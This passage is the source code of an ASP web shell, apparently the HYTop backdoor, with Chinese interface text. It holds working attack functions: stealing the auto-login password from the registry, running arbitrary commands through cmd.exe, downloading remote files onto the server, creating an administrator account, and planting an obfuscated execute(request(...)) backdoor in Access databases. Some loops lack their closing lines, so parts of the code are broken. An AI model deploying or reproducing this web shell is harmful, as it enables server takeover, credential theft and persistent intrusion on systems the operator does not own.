        For i = 0 To UBound(aryExEnvList)
          echo "<li>" & aryExEnvList(i) & ": " & wsX.ExpandEnvironmentStrings("%" & aryExEnvList(i) & "%") & "</li>"
        echo "<hr/></ol>"
        Set sa = Nothing
        Set objWshSysEnv = Nothing
      End Sub

      Sub getSrvDrvInfo()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim objTheDrive
        echo "<br/><a href=javascript:showHideMe(srvDriveInf);>服务器磁盘信息:</a>"
        echo "<ol id=srvDriveInf><hr/>"
        echo "<div id='fsoDriveList'>"
        echo "<span>盘符</span><span>类型</span><span>卷标</span><span>文件系统</span><span>可用空间</span><span>总空间</span><br/>"
        For Each objTheDrive In fsoX.Drives
          echo "<span>" & objTheDrive.DriveLetter & "</span>"
          echo "<span>" & getDriveType(objTheDrive.DriveType) & "</span>"
          If UCase(objTheDrive.DriveLetter) = "A" Then
            echo "<br/>"
            echo "<span>" & objTheDrive.VolumeName & "</span>"
            echo "<span>" & objTheDrive.FileSystem & "</span>"
            echo "<span>" & getTheSize(objTheDrive.FreeSpace) & "</span>"
            echo "<span>" & getTheSize(objTheDrive.TotalSize) & "</span><br/>"
          End If
          If Err Then
            echo "<br/>"
          End If
        echo "</div><hr/></ol>"
        Set objTheDrive = Nothing
      End Sub
      Sub getSiteRootInfo()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim objTheFolder
        Set objTheFolder = fsoX.GetFolder(Server.MapPath("/"))
        echo "<br/><a href=javascript:showHideMe(siteRootInfo);>站点根目录信息:</a>"
        echo "<ol id=siteRootInfo><hr/>"
        echo "<li>物理路径: " & Server.MapPath("/") & "</li>"
        echo "<li>当前大小: " & getTheSize(objTheFolder.Size) & "</li>"
        echo "<li>文件数: " & objTheFolder.Files.Count & "</li>"
        echo "<li>文件夹数: " & objTheFolder.SubFolders.Count & "</li>"
        echo "<li>创建日期: " & objTheFolder.DateCreated & "</li>"
        echo "<li>最后访问日期: " & objTheFolder.DateLastAccessed & "</li>"
        echo "</ol>"
      End Sub
      Sub getTerminalInfo()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim terminalPortPath, terminalPortKey, termPort
        Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
        Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername, autoLoginPassword

        terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
        terminalPortKey = "PortNumber"
        termPort = wsX.RegRead(terminalPortPath & terminalPortKey)

        echo "终端服务端口及自动登录信息<hr/><ol>"
        If termPort = "" Or Err.Number <> 0 Then
          echo "无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
          echo "当前终端服务端口: " & termPort & "<br/>"
        End If
        autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"
        autoLoginEnableKey = "AutoAdminLogon"
        autoLoginUserKey = "DefaultUserName"
        autoLoginPassKey = "DefaultPassword"
        isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
        If isAutoLoginEnable = 0 Then
          echo "系统自动登录功能未开启<br/>"
          autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
          echo "自动登录的系统帐户: " & autoLoginUsername & "<br>"
          autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
          If Err Then
            echo "False"
          End If
          echo "自动登录的帐户密码: " & autoLoginPassword & "<br>"
        End If
        echo "</ol>"
      End Sub

      Sub PageLogin()
        Dim theAct, passWord
        theAct = Request("theAct")
        passWord = Request("userPassword")

        If theAct = "chkLogin" Then


          If passWord = userPassword Then
            Session(m & "userPassword") = passWord
            echo "<script language=javascript>alert('Logined Unsuccessfully...^_^');history.back();</script>"
          End If
        End If
        echo "<style>body{ margin:8;text-align:center; }</style>"
        echo "<hr/>"
        echo "<body onload=document dot forms[0].userPassword.focus();>"
        echo "<form method=post onsubmit=this.Submit.disabled=true;>"
        echo "<input name=userPassword class=input type=password size=30> "
        echo "<input type=hidden name=theAct value=chkLogin>"
        echo "<input type=submit name=Submit value=""" & HtmlEncode(myName) & """ class=input>"
        echo "<hr/>"
        echo "</form>"
        echo "<body>"
      End Sub

      Sub pageMsDataBase()
        Dim theAct, sqlStr
        theAct = Request("theAct")
        sqlStr = Request("sqlStr")
        showTitle("MDB+MsSQL Database Page")
        If sqlStr = "" Then
          If Session(m & "sqlStr") = "" Then
            sqlStr = "e:\asp.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=asp;Password=asp;Database=asp;"
            sqlStr = Session(m & "sqlStr")
          End If
        End If
        Session(m & "sqlStr") = sqlStr
        echo "<style>body{ margin:8; }</style>"
        echo "<form method=post action='?pageName=MsDataBase&theAct=showTables' onSubmit='this.Submit.disabled=true;'>"
        echo "<a href='?pageName=MsDataBase'>MDB+MsSQL Database Page</a><br/>"
        echo "<input name=sqlStr type=text id=sqlStr value=""" & sqlStr & """ size=60 style='80%;'>"
        echo "<input name=theAct type=hidden value=showTables><br/>"
        echo "<input type=Submit name=Submit value=' 提交 '>"
        echo "<input type=button name=Submit2 value=' 插入 ' onclick=""if(confirm('这里是在ACESS数据里插入海阳顶端网ASP后门\n默认密码是" & clientPassword & "\n后门插入后可以使用的前提是\n数据库是asp后缀, 并且没有错乱asp代码\n确认操作吗?')){ location.href='?pageName=MsDataBase&theAct=inject&sqlStr='+this.form.sqlStr.value;this.disabled=true; }"">"
        echo "<input type=button value=' 示例 ' onclick=""this.form.sqlStr.value='e:\\Asp.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=asp;Password=asp;Database=asp;';"">"
        echo "</form>"
        echo "<hr/>注: 插入只针对ACCESS操作, 要浏览ACCESS在表单中的写法是""e:\Asp.mdb"", SQL据库写法是""sql:连接字符串"", 不要忘写sql:。<hr/>"

        Select Case theAct
          Case "showTables"
          Case "query"
          Case "inject"
        End Select
        echo ""
      End Sub
      Sub showTables()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr
        sqlStr = Request("sqlStr")
        If LCase(Left(sqlStr, 4)) = "sql:" Then
          connStr = Mid(sqlStr, 5)
          connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
        End If
        Set conn = Server.CreateObject("Adodb.Connection")
        conn.Open connStr
        tablesStr = getTableList(conn, sqlStr, rsTable)
        echo "<a href=""?pageName=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr) & """>数据库表结构查看:</a><br/>"
        echo tablesStr & "<hr/>"
        echo "<a href=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>转到SQL命令执行</a><hr/>"

        Do Until rsTable.Eof
          Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))
          echo "<table border=0 cellpadding=0 cellspacing=0><tr><td height=22 colspan=6><b>" & rsTable("Table_Name") & "</b></td>"
          echo "</tr><tr><td colspan=6><hr/></td></tr><tr align=center>"
          echo "<td>字段名</td><td>类型</td><td>大小</td><td>精度</td><td>允许为空</td><td>默认值</td></tr>"
          echo "<tr><td colspan=6><hr/></td></tr>"

          Do Until rsColumn.Eof
            echo "<tr align=center>"
            echo "<td align=Left> " & rsColumn("Column_Name") & "</td>"
            echo "<td width=80>" & getDataType(rsColumn("Data_Type")) & "</td>"
            echo "<td width=70>" & rsColumn("Character_Maximum_Length") & "</td>"
            echo "<td width=70>" & rsColumn("Numeric_Precision") & "</td>"
            echo "<td width=70>" & rsColumn("Is_Nullable") & "</td>"
            echo "<td width=80>" & rsColumn("Column_Default") & "</td>"
            echo "</tr>"
          echo "<tr><td colspan=6><hr/></td></tr></table>"

        echo "<hr/>"

        Set conn = Nothing
        Set rsTable = Nothing
        Set rsColumn = Nothing
      End Sub
      Sub showQuery()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable
        sql = Request("sql")
        page = Request("page")
        sqlStr = Request("sqlStr")
        theTable = Request("theTable")
        If Not IsNumeric(page) or page = "" Then
          page = 1
        End If
        If sql = "" And theTable <> "" Then
          sql = "Select top " & dbSelectNumber & " * from [" & theTable & "]"
        End If
        If LCase(Left(sqlStr, 4)) = "sql:" Then
          connStr = Mid(sqlStr, 5)
          connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
        End If
        Set rs = Server.CreateObject("Adodb.RecordSet")
        Set conn = Server.CreateObject("Adodb.Connection")
        conn.Open connStr
        tablesStr = getTableList(conn, sqlStr, rsTable)

        echo "<a href=""?pageName=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr) & """>数据库表结构查看:</a><br/>"
        echo tablesStr & "<hr/>"
        echo "<a href=?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & ">SQL命令执行及查看</a>"
        echo "<br/><form method=post action=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>"
        echo "<input name=sql type=text id=sql value=""" & HtmlEncode(sql) & """ size=60>"
        echo "<input type=Submit name=Submit4 value=执行查询><hr/>"

        If sql <> "" And Left(LCase(sql), 7) = "select " Then
          rs.Open sql, conn, 1, 1
          rs.PageSize = 20
          If Not rs.Eof Then
            rs.AbsolutePage = page
          End If
          If rs.Fields.Count>0 Then
            echo "<br><table border=""1"" cellpadding=""0"" cellspacing=""0"" width=""98%"">"
            echo "<tr>"
            echo "<td height=""22"" align=""center"" class=""tr"" colspan=""" & rs.Fields.Count & """>SQL操作 - 执行结果</td>"
            echo "</tr>"
            echo "<tr>"
            For j = 0 To rs.Fields.Count-1
              echo "<td height=""22"" align=""center"" class=""td""> " & rs.Fields(j).Name & " </td>"
            For i = 1 To 20
              If rs.Eof Then
                Exit For
              End If
              echo "</tr>"
              echo "<tr valign=top>"
              For j = 0 To rs.Fields.Count-1
                echo "<td height=""22"" align=""center"">" & HtmlEncode(fixNull(rs(j))) & "</td>"
              echo "</tr>"
          End If
          echo "<tr>"
          echo "<td height=""22"" align=""center"" class=""td"" colspan=""" & rs.Fields.Count & """>"
          For i = 1 To rs.PageCount
      If CLng(Request("page")) = i Then
       echo "<font color=red>"&i & "</font> "
       echo Replace("<a href=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & "&page=" & i & """><font { $font" & i & " }>" & i & "</font></a> ", "{ $font" & page & " }", "class=warningColor")
      End If
          echo "</td></tr></table>"
           If sql <> "" Then
            echo "<center><br>执行完毕!</center>"
          End If
        End If

        echo "</form><hr/>"

        Set rs = Nothing
        Set conn = Nothing
        Set rsTable = Nothing
      End Sub
      Function getDataType(typeId)
        Select Case typeId
          Case 130
            getDataType = "文本"
          Case 2
            getDataType = "整型"
          Case 3
            getDataType = "长整型"
          Case 7
            getDataType = "日期/时间"
          Case 5
            getDataType = "双精度型"
          Case 11
            getDataType = "是/否"
          Case 128
            getDataType = "OLE 对象"
          Case Else
            getDataType = typeId
        End Select
      End Function
      Sub accessInject()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim rs, conn, sqlStr, connStr
        sqlStr = Request("sqlStr")
        If LCase(Left(sqlStr, 4)) = "sql:" Then
          connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
        End If
        Set rs = Server.CreateObject("Adodb.RecordSet")
        Set conn = Server.CreateObject("Adodb.Connection")

        conn.Open connStr

        If notdownloadsExists = True Then
          conn.Execute("drop table notdownloads")
        End If

        conn.Execute("create table notdownloads(notdownloads oleobject)")

        rs.Open "notdownloads", conn, 1, 3
        rs("notdownloads").AppendChunk(ChrB(Asc("<")) & ChrB(Asc("%")) & ChrB(Asc("e")) & ChrB(Asc("x")) & ChrB(Asc("e")) & ChrB(Asc("c")) & ChrB(Asc("u")) & ChrB(Asc("t")) & ChrB(Asc("e")) & ChrB(Asc("(")) & ChrB(Asc("r")) & ChrB(Asc("e")) & ChrB(Asc("q")) & ChrB(Asc("u")) & ChrB(Asc("e")) & ChrB(Asc("s")) & ChrB(Asc("t")) & ChrB(Asc("(")) & ChrB(Asc("""")) & ChrB(Asc(clientPassword)) & ChrB(Asc("""")) & ChrB(Asc(")")) & ChrB(Asc(")")) & ChrB(Asc("%")) & ChrB(Asc(">")) & ChrB(Asc(" ")))
        echo "<script language=""javascript"">alert('插入成功!');history.back();</script>"
        Set rs = Nothing
        Set conn = Nothing
      End Sub
      Function getTableList(conn, sqlStr, rsTable)
        Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))

        Do Until rsTable.Eof
          getTableList = getTableList & "<a href=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&theTable=" & UrlEncode(rsTable("Table_Name")) & """>[" & rsTable("Table_Name") & "]</a> "
      End Function

      Sub PageObjOnSrv()
        Dim i, objTmp, txtObjInfo, strObjectList, strDscList
        txtObjInfo = Trim(Request("txtObjInfo"))

        strObjectList = "MSWC.AdRotator,MSWC.BrowserType,MSWC.NextLink,MSWC.Tools,MSWC.Status,MSWC.Counters,IISSample.ContentRotator," & _
                "IISSample.PageCounter,MSWC.PermissionChecker,Adodb.Connection,SoftArtisans.FileUp,SoftArtisans.FileManager,LyfUpload.UploadFile," & _
                "Persits.Upload.1,W3.Upload,JMail.SmtpMail,CDONTS.NewMail,Persits.MailSender,SMTPsvg.Mailer,DkQmail.Qmail,Geocel.Mailer," & _
                "IISmail.Iismail.1,SmtpMail.SmtpMail.1,SoftArtisans.ImageGen,W3Image.Image," & _
        strDscList = "广告轮换,浏览器信息,内容链接库,,,计数器,内容轮显,,权限检测,ADO 数据对象,SA-FileUp 文件上传,SoftArtisans 文件管理," & _
               "刘云峰的文件上传组件,ASPUpload 文件上传,Dimac 文件上传,Dimac JMail 邮件收发,虚拟 SMTP 发信,ASPemail 发信,ASPmail 发信,dkQmail 发信," & _
               "Geocel 发信,IISmail 发信,SmtpMail 发信,SA 的图像读写,Dimac 的图像读写组件," & _
               "FSO,Stream 流,,,"

        aryObjectList = Split(strObjectList, ",")
        aryDscList = Split(strDscList, ",")


        echo "其他组件支持情况检测<br/>"
        echo "在下面的输入框中输入你要检测的组件的ProgId或ClassId。<br/>"
        echo "<form method=post>"
        echo "<input name=txtObjInfo size=30 value=""" & txtObjInfo & """><input name=theAct type=submit value=我要检测>"
        echo "</form>"

        If Request("theAct") = "我要检测" And txtObjInfo <> "" Then
          Call getObjInfo(txtObjInfo, "")
        End If
        echo "<hr/>"
        echo "<lu>组件名称 ┆ 支持及其它"

        For i = 0 To UBound(aryDscList)
          Call getObjInfo(aryObjectList(i), aryDscList(i))

        echo "</lu><hr/>"   
      End Sub
      Sub getObjInfo(strObjInfo, strDscInfo)
        Dim objTmp

        If isDebugMode = False Then
          On Error Resume Next
        End If

        echo "<li> " & strObjInfo
        If strDscInfo <> "" Then
          echo " (" & strDscInfo & "组件)"
        End If

        echo " ┆ "

        Set objTmp = Server.CreateObject(strObjInfo)
        If Err <> -2147221005 Then
          echo "√ "
          echo "Version: " & objTmp.Version & "; "
          echo "About: " & objTmp.About
          echo "×"
        End If
        echo "</li>"

        If Err Then
        End If
        Set objTmp = Nothing
      End Sub

      Sub PageOtherTools()
        Dim theAct
        theAct = Request("theAct")


        Select Case theAct
          Case "downFromUrl"
          Case "addUser"
            AddUser Request("userName"), Request("passWord")
          Case "readReg"
        End Select

        echo "数制转换:<hr/>"
        echo "<input name=text1 value=字符和数字转10和16进制 size=25 id=text9>"
        echo "<input type=button onclick=main(); value=给我转>"
        echo "<input value=16进制转10进制和字符 size=25 id=vars>"
        echo "<input type=button onClick=main2(); value=给我转>"
        echo "<hr/>"
        echo "下载到服务器:<hr/>"
        echo "<form method=post target=_blank>"
        echo "<input name=theUrl value='http://' size=80><input type=submit value=' 下载 '><br/>"
        echo "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
        echo "<input type=checkbox name=overWrite value=2>存在覆盖"
        echo "<input type=hidden value=downFromUrl name=theAct>"
        echo "</form>"
        echo "<hr/>"
        echo "文件编辑:<hr/>"
        echo "<form method=post action='?' target=_blank>"
        echo "<input size=80 name=thePath value=""" & HtmlEncode(Request.ServerVariables("PATH_TRANSLATED")) & """>"
        echo "<input type=hidden value=showEdit name=theAct>"
        echo "<select name=pageName><option value=AppFileExplorer>用Stream</option><option value=FsoFileExplorer>用FSO</option></select>"
        echo "<input type=submit value=' 打开 '>"
        echo "</form><hr/>"
        echo "管理帐号添加(成功率极低):<hr/>"
        echo "<form method=post target=_blank>"
        echo "<input type=hidden value=addUser name=theAct>"
        echo "<input name=userName value='HYTop' size=39>"
        echo "<input name=passWord type=password value='HYTop' size=39>"
        echo "<input type=submit value=' 添加 '>"
        echo "</form><hr/>"
        echo "注册表键值读取(<a href=javascript:showHideMe(regeditInfo);>资料</a>):<hr/>"
        echo "<form method=post target=_blank>"
        echo "<input type=hidden value=readReg name=theAct>"
        echo "<input name=thePath value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName' size=80>"
        echo "<input type=submit value=' 读取 '>"
        echo "<span id=regeditInfo style='display:none;'><hr/>"
        echo "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-DisplayLastUserName,REG_SZ,1 { 不显示上次登录用户 }<br/>"
        echo "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,0 { 0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享 }<br/>"
        echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,REG_DWORD,0 { 禁止默认共享 }<br/>"
        echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSharedNetDrives,REG_SZ,0 { 关闭网络共享 }<br/>"
        echo "HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters,REG_DWORD,1 { 启用TCP/IP筛选(所有试配器) }<br/>"
        echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 { 允许IP路由 }<br/>"
        echo "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
        echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{ 8A465128-8E99-4B0C-AFF3-1348DC55EB2E }\DefaultGateway,REG_MUTI_SZ { 默认网关 }<br/>"
        echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{ 8A465128-8E99-4B0C-AFF3-1348DC55EB2E }\NameServer { 首DNS }<br/>"
        echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{ 8A465128-8E99-4B0C-AFF3-1348DC55EB2E }\TCPAllowedPorts { 允许的TCP/IP端口 }<br/>"
        echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{ 8A465128-8E99-4B0C-AFF3-1348DC55EB2E }\UDPAllowedPorts { 允许的UDP端口 }<br/>"
        echo "-----------OVER--------------------<br/>"
        echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count { 共几块活动网卡 }<br/>"
        echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind { 当前网卡的序列(把上面的替换) }<br/>"
        echo "==========================================================<br/>以上资料由kEvin1986提供"
        echo "</span>"
        echo "</form><hr/>"
        echo "<script language=vbs>" & vbNewLine
        echo "sub main()" & vbNewLine
        echo "base=document.all.text9.value" & vbNewLine
        echo "If IsNumeric(base) Then" & vbNewLine
        echo "cc=hex(cstr(base))" & vbNewLine
        echo "alert(""10进制为""&base)" & vbNewLine
        echo "alert(""16进制为""&cc)" & vbNewLine
        echo "exit sub" & vbNewLine
        echo "end if" & vbNewLine
        echo "aa=asc(cstr(base))" & vbNewLine
        echo "bb=hex(aa)" & vbNewLine
        echo "alert(""10进制为""&aa)" & vbNewLine
        echo "alert(""16进制为""&bb)" & vbNewLine
        echo "end sub" & vbNewLine
        echo "sub main2()" & vbNewLine
        echo "If document.all.vars.value<>"""" Then" & vbNewLine
        echo "Dim nums,tmp,tmpstr,i" & vbNewLine
        echo "nums=document.all.vars.value" & vbNewLine
        echo "nums_len=Len(nums)" & vbNewLine
        echo "For i=1 To nums_len" & vbNewLine
        echo "tmp=Mid(nums,i,1)" & vbNewLine
        echo "If IsNumeric(tmp) Then" & vbNewLine
        echo "tmp=tmp * 16 * (16^(nums_len-i-1))" & vbNewLine
        echo "Else" & vbNewLine
        echo "If ASC(UCase(tmp))<65 Or ASC(UCase(tmp))>70 Then" & vbNewLine
        echo "alert(""你输入的数值中有非法字符,16进制数只包括1~9及a~f之间的字符,请重新输入。"")" & vbNewLine
        echo "exit sub" & vbNewLine
        echo "End If" & vbNewLine
        echo "tmp=(ASC(UCase(tmp))-55) * (16^(nums_len-i))" & vbNewLine
        echo "End If" & vbNewLine
        echo "tmpstr=tmpstr+tmp" & vbNewLine
        echo "Next" & vbNewLine
        echo "alert(""转换的10进制为:""&tmpstr&""其字符值为:""&chr(tmpstr))" & vbNewLine
        echo "End If" & vbNewLine
        echo "end sub" & vbNewLine
        echo "</script>" & vbNewLine

        echo ""
      End Sub
      Sub downFromUrl()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim Http, theUrl, thePath, stream, fileName, overWrite
        theUrl = Request("theUrl")
        thePath = Request("thePath")
        overWrite = Request("overWrite")
        Set stream = Server.CreateObject("Adodb.Stream")
        Set Http = Server.CreateObject("MSXML2.XMLHTTP")
        If overWrite <> 2 Then
          overWrite = 1
        End If
        Http.Open "GET", theUrl, False
        If Http.ReadyState <> 4 Then
          Exit Sub
        End If
        With stream
          .Type = 1
          .Mode = 3
          .Write Http.ResponseBody
          .Position = 0
          .SaveToFile thePath, overWrite
          If Err.Number = 3004 Then
            fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
            If fileName = "" Then
              fileName = "index.htm.txt"
            End If
            thePath = thePath & "\" & fileName
            .SaveToFile thePath, overWrite
          End If
        End With
        alertThenClose("文件 " & Replace(thePath, "\", "\\") & " 下载成功!")
        Set Http = Nothing
        Set Stream = Nothing
      End Sub
      Sub AddUser(strUser, strPassword)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim computer, theUser, theGroup
        Set computer = Getobject("WinNT://.")
        Set theGroup = GetObject("WinNT://./Administrators,group")
        Set theUser = computer.Create("User", strUser)
        theGroup.Add theUser
        Set theUser = Nothing
        Set computer = Nothing
        Set theGroup = Nothing
        echo getUserInfo(strUser)
      End Sub
      Sub readReg()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim i, thePath, theArray
        thePath = Request("thePath")
    '    echo thePath & "<br/>"
        theArray = wsX.RegRead(thePath)
        If IsArray(theArray) Then
          For i = 0 To UBound(theArray)
            echo "<li>" & theArray(i)
          echo "<li>" & theArray
        End If
      End Sub

      Sub PageList()

        echo "<base target=_blank>"
        echo "<hr/>"
        echo "<ol><li><a href='?pageName=ServiceList'>系统服务信息</a></li>"
        echo "<br/>"
        echo "<li><a href='?pageName=infoAboutSrv'>服务器相关数据</a><br/>("
        echo "<a href='?pageName=infoAboutSrv&theAct=getSrvInfo'>系统参数</a>,"
        echo "<a href='?pageName=infoAboutSrv&theAct=getSrvDrvInfo'>系统磁盘</a>,"
        echo "<a href='?pageName=infoAboutSrv&theAct=getSiteRootInfo'>站点文件夹</a>,"
        echo "<a href='?pageName=infoAboutSrv&theAct=getTerminalInfo'>终端端口&自动登录</a>)</li>"
        echo "<li><a href='?pageName=objOnSrv'>服务器组件探针</a></li>"
        echo "<li><a href='?pageName=userList'>系统用户及用户组信息</a></li>"
        echo "<li><a href='?pageName=CSInfo'>客户端服务器交互信息</a></li>"
        echo "<li><a href='?pageName=WsCmdRun'>WScript dot Shell程序运行器</a></li>"
        echo "<li><a href='?pageName=SaCmdRun'>Shell.Application程序运行器</a></li>"
        echo "<li><a href='?pageName=FsoFileExplorer'>FSO文件浏览操作器</a></li>"
        echo "<li><a href='?pageName=AppFileExplorer'>Shell.Application文件浏览操作器</a></li>"
        echo "<li><a href='?pageName=MsDataBase'>微软数据库查看/操作器</a></li>"
        echo "<li><a href='?pageName=OtherTools'>一些零碎的小东西</a></li>"
        echo "</ol>"
        echo "<hr/>"
      End Sub

      Sub PageSaCmdRun()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim theFile, thePath, theAct, appPath, appName, appArgs
        theAct = Trim(Request("theAct"))
        appPath = Trim(Request("appPath"))
        thePath = Trim(Request("thePath"))
        appName = Trim(Request("appName"))
        appArgs = Trim(Request("appArgs"))

        If theAct = "doAct" Then
          If appName = "" Then
            appName = "cmd.exe"
          End If
          If appPath <> "" And Right(appPath, 1) <> "\" Then
            appPath = appPath & "\"
          End If
          If LCase(appName) = "cmd.exe" And appArgs <> "" Then
            If LCase(Left(appArgs, 2)) <> "/c" Then
              appArgs = "/c " & appArgs
            End If
            If LCase(appName) = "cmd.exe" And appArgs = "" Then
              appArgs = "/c "
            End If
          End If
          saX.ShellExecute appName, appArgs, appPath, "", 0
        End If
        If theAct = "readResult" Then
          echo encode(streamLoadFromFile(aspPath))
          If Err Then
            Set theFile = fsoX.OpenTextFile(aspPath)
            echo encode(theFile.ReadAll())
            Set theFile = Nothing
          End If
        End If
        echo "<style>body{ margin:8;border:none;background-color:buttonface; }</style>"
        echo "<body onload=""document.forms[0].appArgs.focus();setTimeout('wsLoadIFrame();', 3900);"">"
        echo "<form method=post onSubmit='this.Submit.disabled=true'>"
        echo "<input type=hidden name=theAct value=doAct>"
        echo "<input type=hidden name=aspPath value=""" & HtmlEncode(aspPath) & """>"
        echo "所在路径: <input name=appPath type=text id=appPath value=""" & HtmlEncode(appPath) & """ size=62><br/>"
        echo "程序文件: <input name=appName type=text id=appName value=""" & HtmlEncode(appName) & """ size=62> "
        echo "<input type=button name=Submit4 value=' 回显 ' onClick=""this.form.appArgs.value+=' > '+this.form.aspPath.value;""><br/> "
        echo "命令参数: <input name=appArgs type=text id=appArgs value=""" & HtmlEncode(appArgs) & """ size=62> "
        echo "<input type=submit name=Submit value=' 运行 '><br/>"
        echo "<hr/>注: 只有命令行程序在CMD.EXE运行环境下才可以进行临时文件回显(利用"">""符号),其它程序只能执行不能回显.<br/>"
        echo "  由于命令执行时间同网页刷新时间不同步,所以有些执行时间长的程序结果需要手动刷新下面的iframe才能得到.回显后记得删除临时文件.<hr/>"
        echo "<iframe id=cmdResult style='100%;height:78%;'>"
        echo "</iframe>"
        echo "</form>"
        echo "</body>"
      End Sub

      Sub PageServiceList()
        Dim sa, objService, objComputer
        Set objComputer = GetObject("WinNT://.")
        Set sa = Server.CreateObject("Shell.Application")
        objComputer.Filter = Array("Service")
        echo "<ol>"
        If isDebugMode = False Then
          On Error Resume Next
        End If
        For Each objService In objComputer
          echo "<li>" & objService.Name & "</li><hr/>"
          echo "<ol>服务名称: " & objService.Name & "<br/>"
          echo "显示名称: " & objService.DisplayName & "<br/>"
          echo "启动类型: " & getStartType(objService.StartType) & "<br/>"
          echo "运行状态: " & sa.IsServiceRunning(objService.Name) & "<br/>"
          echo "当前状态: " & objService.Status & "<br/>"
          echo "服务类型: " & objService.ServiceType & "<br/>"
          echo "登录身份: " & objService.ServiceAccountName & "<br/>"
          echo "服务描述: " & getServiceDsc(objService.Name) & "<br/>"
          echo "文件路径及参数: " & objService.Path
          echo "</ol><hr/>"
        echo "</ol><hr/>"
        Set sa = Nothing
      End Sub
      Function getServiceDsc(strService)
        Dim ws
        Set ws = Server.CreateObject("WScript.Shell")
        getServiceDsc = ws.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" & strService & "\Description")
        Set ws = Nothing
      End Function

      Sub PageUserList()
        Dim objUser, objGroup, objComputer
        Set objComputer = GetObject("WinNT://.")
        objComputer.Filter = Array("User")
        echo "<a href=javascript:showHideMe(userList);>User:</a>"
        echo "<span id=userList><hr/>"
        For Each objUser in objComputer
          echo "<li>" & objUser.Name & "</li>"
          echo "<ol><hr/>"
          echo "<hr/></ol>"
        echo "</span>"
        echo "<br/><a href=javascript:showHideMe(userGroupList);>UserGroup:</a>"
        echo "<span id=userGroupList><hr/>"
        objComputer.Filter = Array("Group")
        For Each objGroup in objComputer
          echo "<li>" & objGroup.Name & "</li>"
          echo "<ol><hr/>" & objGroup.Description & "<hr/></ol>"
        echo "</span><hr/>"

      End Sub
      Sub getUserInfo(strUser)
        Dim User, Flags
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Set User = GetObject("WinNT://./" & strUser & ",user")
        echo "描述: " & User.Description & "<br/>"
        echo "所属用户组: " & getItsGroup(strUser) & "<br/>"
        echo "密码已过期: " & cbool(User.Get("PasswordExpired")) & "<br/>"
        Flags = User.Get("UserFlags")
        echo "密码永不过期: " & cbool(Flags And &H10000) & "<br/>"
        echo "用户不能更改密码: " & cbool(Flags And &H00040) & "<br/>"
        echo "非全局帐号: " & cbool(Flags And &H100) & "<br/>"
        echo "密码的最小长度: " & User.PasswordMinimumLength & "<br/>"
        echo "是否要求有密码: " & User.PasswordRequired & "<br/>"
        echo "帐号停用中: " & User.AccountDisabled & "<br/>"
        echo "帐号锁定中: " & User.IsAccountLocked & "<br/>"
        echo "用户信息文件: " & User.Profile & "<br/>"
        echo "用户登录脚本: " & User.LoginScript & "<br/>"
        echo "用户Home目录: " & User.HomeDirectory & "<br/>"
        echo "用户Home目录根: " & User.Get("HomeDirDrive") & "<br/>"
